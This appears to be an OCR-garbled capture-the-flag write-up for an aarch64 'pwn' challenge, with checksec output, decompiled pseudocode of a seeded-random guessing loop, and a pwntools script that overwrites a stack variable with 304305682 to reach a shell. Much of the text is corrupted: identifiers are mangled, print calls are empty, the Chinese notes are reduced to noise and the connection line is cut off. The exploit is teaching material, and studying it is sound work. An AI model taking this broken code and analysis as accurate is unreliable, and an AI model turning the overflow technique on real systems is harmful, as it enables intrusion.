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# checksec pwn
[*] reot;\xe4\xb8\xub\xea\xbd\xbd;chctffcount;pwn
Arch aarch64-64-little
RELRO: Partial RELRO
Stack:
NX:
PIE:
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__int64 v7;

int v8;

int v9;

int v10;
int v11;
int v12;
int v13;
int vi14;
unsigned
int v16;

sub_400940();
v1ée 0;
do
{
vO = time(OLL);
vo;
vl srand(ve);
v2 (unsigned int)((signed int)rand(v1)
vld v2;
e (unsigned int)((signed int)rand(v2)
v13 vV3;
\Z (unsigned int)((signed int)rand(v3)
\ W v4;
v11l (signed int)rand(v4) 100;
printf( )
printf(
printf( )
read(OLL, &v6, 20LL);
vie vi4 v13 v12 v1l;
v9 strtol(&v6, OLL, 10LL);
if ( vie v9 )
{
puts( )
exit(OLL);
b
puts(
v16;
s
while ( vi16 199 );
v8 256;
read(OLL, &v7, OX6ELL);
if ( v8 304305682 )
{
puts( )s
sub_400920();

)i
return OLL;
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int6d sub_400920
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__1nt64 sub 400990()
{

unsigned int vO; // woO
int64 v1; // x0

__int64 v2; // x0
__int64 v3; // x0
int64 v4; // x0

__int64 vo6; // [xsp+10h] [xbp+10h]

_int64 v7; // [xsp+78h] [xbp+78h]
int v8; // [xsp+DCh] [xbp+DCh]

int v9; // [xsp+EOh] [xbp+EQh]

int v10; // [xsp+E4h] [xbp+E4h]

int v11; // [xsp+EBh] [xbp+E8h]

int v12; // [xsp+ECh] [xbp+ECh]

int v13; // [xsp+F0Oh] [xbp+FOh]

int v14; // [xsp+F4h] [xbp+F4h]

unsigned int v15; // [xsp+F8h] [xbp+F8h]
int v16; // [xsp+FCh] [xbp+FCh]

sub _400940();
v1le = 0;
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T4 V7 7 L3 N OX6E , 1105235 WIF 7T LL 78 %5 BIv8, 101

v8 = 256;

read(OLL, &v7, Ox6ELL);
if ( v8 == 304305682 )
{

puts("get it ~");
it A R R % A
BH200%, V72 B 55 v87E B 304305682, 3k Btshell
exploit:
from pwn import

,40285)

p.recvuntil( )
s=p.recvuntil( )[:-6]
p.sendlineafter( 5
print p.recv(5)

payload 100+p64 (304305682)
p.sendline(payload)

p.interactive()
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